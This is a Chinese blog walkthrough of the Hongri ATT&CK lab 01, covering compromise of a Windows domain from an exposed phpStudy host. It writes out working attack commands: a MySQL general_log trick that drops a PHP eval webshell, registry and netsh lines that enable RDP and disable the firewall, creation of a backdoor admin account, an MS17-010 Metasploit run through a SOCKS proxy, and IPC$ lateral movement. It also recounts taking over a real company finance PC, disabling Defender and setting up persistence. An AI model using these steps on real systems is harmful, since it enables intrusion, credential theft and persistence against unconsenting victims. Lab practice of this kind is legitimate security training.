环境配置
![图片[1],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814073955722.png?imageView2/0/format/webp/q/75)
目标就是拿下域控(域管)
![图片[2],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814075136297.png?imageView2/0/format/webp/q/75)
整个流程图
![图片[3],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815111556536.png?imageView2/0/format/webp/q/75)
需要注意的是:192.168.52.143也在域内 可以IPC或者PTH横向打过去
渗透
使用无影对
192.168.111.128进行扫描
![图片[4],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814075434429.png?imageView2/0/format/webp/q/75)
访问80端口是个Phpstudy探针
![图片[5],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814082144102.png?imageView2/0/format/webp/q/75)
搜索phpstudy的历史漏洞,尝试后没打进去
扫目录后发现phpmyadmin
![图片[6],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814083820420.png?imageView2/0/format/webp/q/75)
root/root成功登录
尝试写入shell
发现写不进shell
查看日志
show variables like '%general%';
![图片[7],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814084456232.png?imageView2/0/format/webp/q/75)
开启日志
set global general_log=on;
![图片[8],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814084637821.png?imageView2/0/format/webp/q/75)
设置日志路径set global general_log_file=’C:/phpStudy/WWW/info.php’
![图片[9],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814085508935.png?imageView2/0/format/webp/q/75)
写入木马
![图片[10],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814100519434.png?imageView2/0/format/webp/q/75)
SELECT <?php @eval($_GET['123']); ?>
成功执行
![图片[11],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814100510731.png?imageView2/0/format/webp/q/75)
上线到哥斯拉
![图片[12],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814101523887.png?imageView2/0/format/webp/q/75)
执行whoami命令证明shell成功
![图片[13],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814101828563.png?imageView2/0/format/webp/q/75)
查看一下端口开没开3389
![图片[14],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814101958890.png?imageView2/0/format/webp/q/75)
注册表打开3389权限
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭防火墙,开放3389端口
netsh firewall set opmode disable
netsh advfirewall firewall Add rule name="RDP" dir=in protocol=tcp localport=3389 action=allow
添加远程桌面账号密码
net user Test123$ 1qaz@WSX /add && net localgroup administrators Test123$ /add
有人在,在真实攻防的时候要趁没人的时候给他挤下来
(之前攻防现场3389控了个某公司财务电脑,有windows defener上不了Vshell我们趁着中午的时候给她挤下来关掉了defener成功上线了,并做了维权处理)
![图片[15],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250814103539542.png?imageView2/0/format/webp/q/75)
![图片[16],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815014643848.png?imageView2/0/format/webp/q/75)
可以直接mimikatz dump哈希或者上CS
dump哈希密码hongrisec@2019
上个CS里面插件比较多
有域控在CS上打比较方便
设置一下回连
![图片[17],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815052337938.png?imageView2/0/format/webp/q/75)
哈希
![图片[18],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815101016699.png?imageView2/0/format/webp/q/75)
双网卡
![图片[19],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815053135173.png?imageView2/0/format/webp/q/75)
换个好用的CS
能梭哈就不手动 这个插件多一点
尝试提权到system
![图片[20],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815101330188.png?imageView2/0/format/webp/q/75)
![图片[21],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815101043535.png?imageView2/0/format/webp/q/75)
![图片[22],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815100317793.png?imageView2/0/format/webp/q/75)
扫描到两台MF-010
![图片[23],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815055717401.png?imageView2/0/format/webp/q/75)
![图片[24],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815105516524.png?imageView2/0/format/webp/q/75)
打2003那台
由于我们是双网卡 想用MF010打192.168.52段
所以此时此刻必须搞个隧道代理出来
![图片[25],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815105832763.png?imageView2/0/format/webp/q/75)
![图片[26],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815110245999.png?imageView2/0/format/webp/q/75)
查看自己的IP这里的IP是CS的服务端!
![图片[27],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815113026867.png?imageView2/0/format/webp/q/75)
如果你们使用kali proxychains4出错的话可以看我这个文章
![图片[28],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815110635371.png?imageView2/0/format/webp/q/75)
![图片[29],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815113220645.png?imageView2/0/format/webp/q/75)
交互式shell上传失败了 上一个非交互shell
这里 comman需要自己设置
命令如下
msfconsole
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
setg Proxies socks5:192.168.111.130:1005
exploit
拿下域内用户
![图片[30],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815113337103.png?imageView2/0/format/webp/q/75)
尝试IPC传递
![图片[31],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815121901798.png?imageView2/0/format/webp/q/75)
beacon> shell net use \\192.168.52.138\ipc$ "hongrisec@2020" /user:"administrator"
net use查看是否生效
![图片[32],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815121917981.png?imageView2/0/format/webp/q/75)
执行命令
![图片[33],最全面的解析-红日靶场ATT&CK系列01WP-域控,网络安全爱好者中心-神域博客网](https://img.godyu.com/2025/08/20250815121949208.png?imageView2/0/format/webp/q/75)
成功拿下域控,后续想干什么干什么了
暂无评论内容